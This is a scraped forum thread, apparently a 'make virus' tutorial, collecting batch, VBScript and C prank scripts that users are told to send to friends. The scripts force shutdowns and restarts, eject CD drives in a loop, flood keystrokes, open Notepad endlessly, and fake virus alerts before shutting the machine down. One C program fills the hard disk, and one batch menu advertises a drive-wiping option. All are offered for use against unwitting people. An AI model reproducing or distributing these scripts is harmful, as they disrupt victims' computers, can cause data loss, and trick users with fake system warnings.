viruse

Embed Size (px)

Citation preview

  • 8/7/2019 viruse

    1/7

    john

    [tut] make virus ( share your virus here)

    Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and thendoes a certain action:

    1: Shutdown2: Restart3: Wipes out your hard drive (BEWARE)4: Net send5: Messages then shutdownType :

    Code:@echo offtitle The end of the worldcd C:\:menuclsecho I take no responsibility for your actions. Beyond this point it is you that has the power to killyourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you friedyour computer or if you lost your project etc...pauseecho Pick your poison:echo 1. Die this way (Wimp)echo 2. Die this way (WIMP!)echo 3. DO NOT DIE THIS WAYecho 4. Die this way (you're boring)echo 5. Easy way outset input=nothingset /p input=Choice:if %input%==1 goto oneif %input%==2 goto two

    Save it as "Anything.BAT" and send it.

    johnny gadhharmod ofhackers online and other hacking communities !!

    Mar 31

    johnContinually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!Type :

    Code:Set oWMP = CreateObject("WMPlayer.OCX.7")Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNext

  • 8/7/2019 viruse

    2/7

    End Ifwscript.sleep 5000loop

    Save it as "Anything.VBS" and send it.

    johnny gadhharmod ofhackers online and other hacking communities !!

    Mar 31

    johnConvey your friend a little message and shut down his / her computer:Type :

    Code:@echo offmsg * I don't like youshutdown -c "Error! You are too stupid!" -s

    Save it as "Anything.BAT" in All Files and send it.

    Toggle your friend's Caps Lock button simultaneously:

    Code:Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{CAPSLOCK}"loop

    Save it as "Anything.VBS" and send it.

    johnny gadhharmod ofhackers online and other hacking communities !!

    Mar 31

    johnOpen Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:Type :

    WScript.Sleep 180000WScript.Sleep 10000Set WshShell = WScript.CreateObject("WScript.Shell")WshShell.Run "notepad"WScript.Sleep 100WshShell.AppActivate "Notepad"WScript.Sleep 500WshShell.SendKeys "Hel"WScript.Sleep 500WshShell.SendKeys "lo "

  • 8/7/2019 viruse

    3/7

    WScript.Sleep 500WshShell.SendKeys ", ho"WScript.Sleep 500WshShell.SendKeys "w a"WScript.Sleep 500WshShell.SendKeys "re "WScript.Sleep 500

    WshShell.SendKeys "you"WScript.Sleep 500WshShell.SendKeys "? "WScript.Sleep 500WshShell.SendKeys "I a"WScript.Sleep 500WshShell.SendKeys "m g"WScript.Sleep 500WshShell.SendKeys "ood"WScript.Sleep 500WshShell.SendKeys " th"WScript.Sleep 500WshShell.SendKeys "ank"WScript.Sleep 500

    WshShell.SendKeys "s! "

    Save it as "Anything.VBS" and send it.

    johnny gadhharmod ofhackers online and other hacking communities !!

    Mar 31

    johnFrustrate your friend by making this VBScript hit Enter simultaneously:Type :

    Code:Set wshShell = wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "~(enter)"loop

    Save it as "Anything.VBS" and send it.

    johnny gadhharmod ofhackers online and other hacking communities !!

    Mar 31

    johnFrustrate your friend by making this VBScript hit Backspace simultaneously:Type :

    Code:MsgBox "Let's go back a few steps"Set wshShell =wscript.CreateObject("WScript.Shell")

  • 8/7/2019 viruse

    4/7

    dowscript.sleep 100wshshell.sendkeys "{bs}"loop

    Save it as "Anything.VBS" and send it.

    johnny gadhharmod ofhackers online and other hacking communities !!

    Mar 31

    johnHack your friend's keyboard and make him type "You are a fool" simultaneously:Type :

    Code:Set wshShell = wscript.CreateObject("WScript.Shell")do

    wscript.sleep 100wshshell.sendkeys "You are a fool."loop

    Save it as "Anything.VBS" and send it.

    johnny gadhharmod ofhackers online and other hacking communities !!

    Mar 31

    john

    Open Notepad continually in your friend's computer:Type :

    Code:@ECHO off:topSTART %SystemRoot%\system32\notepad.exeGOTO top

    Save it as "Anything.BAT" and send it.

    johnny gadhharmod ofhackers online and other hacking communities !!

    Apr 1

    johnFAKE VIRUSCopy Paste In Notepad And Save As .bat File

  • 8/7/2019 viruse

    5/7

    @echo offtitle VIRUScolor 06

    echo YOU HAVE A VIRUS ON YOUR COMPUTERpauseecho CONTACTING ANTI-VIRUS....

    pauseecho DO YOU WANT TO DELETE VIRUS?pauseecho ACCESS DENIEDecho ACCESS DENIEDecho ACCESS DENIEDpauseecho ACTIVATING VIRUS.....echo VIRUS ACTIVATED!!!!pause:1dir/sgoto 1

    johnny gadhharmod ofhackers online and other hacking communities !!

    Apr 1

    john

    Another Fake Virus

    Save As .bat File

    @echo off

    echo WINDOWS HAS DETECTED A VIRUS, WOULD YOU LIKE TO TERMINATE?

    echo -

    echo PROCEED WITH VIRUS TERMINATION(Y/N)

    set/p "cho=>"

    if %cho%==Y goto forward

    if %cho%==y goto forward

    if %cho%==n goto Shutdown1

    if %cho%==N goto Shutdown1

    :forward

    echo VIRUS HAS BEEN DELETEDPause

    echo PLEASE ALLOW WINDOWS TO PREFORM A SAFETY CHECK

    Pause

    echo SYSTEM CHECK

    echo HARD DRIVE - FAILED

    echo -

    echo RAM - FAILED

    echo -

  • 8/7/2019 viruse

    6/7

    echo DISK DRIVE - FAILED

    echo -

    echo CONNECTION - FAILED

    echo -

    echo WINDOWS SUGGESTS YOU DELETE ALL FILES TO RESUME(Y/N)

    set/p "cho=>"

    if %cho%==Y goto Sucessif %cho%==y goto Sucess

    if %cho%==n goto Shutdown2

    if %cho%==N goto Shutdown2

    :Sucess

    echo WINDOWS HAS DELETED ALL FILES

    echo -

    echo PLEASE ALLOW WINDOWS TO PREFORM A SAFETY CHECK

    Pause

    echo SYSTEM CHECK

    echo HARD DRIVE - FAILED

    echo -

    echo RAM - FAILEDecho -

    echo DISK DRIVE - FAILED

    echo -

    echo CONNECTION - FAILED

    echo -

    echo WINDOWS IS SHUTTING DOWN IN 20 SECONDS TO PROTECT FROM DAMAGE

    goto Shutdown3

    :Shutdown3

    shutdown -r -t 20 -c "YOU ARE DUMB! HAHAHAHAHAHA"

    :Shutdown1

    shutdown -s -f -t 60 -c "Windows is shutting down to prevent any further damage"

    :Shutdown2shutdown -s -f -t 60 -c "Windows is shutting down to prevent any further damage"

    for jamming hard disk...

    Source Code:-

    //START v.c

    #include

    #include

    void main()

    {

    while(1)

    {

    system("dir>>a.exe");

    }

    }

    //END

    open ur note pad just copy as it is paste it in that ........

    name any like jam.exe...

    but .exe is must.....

  • 8/7/2019 viruse

    7/7

    don't try on ur pc it's small but power full....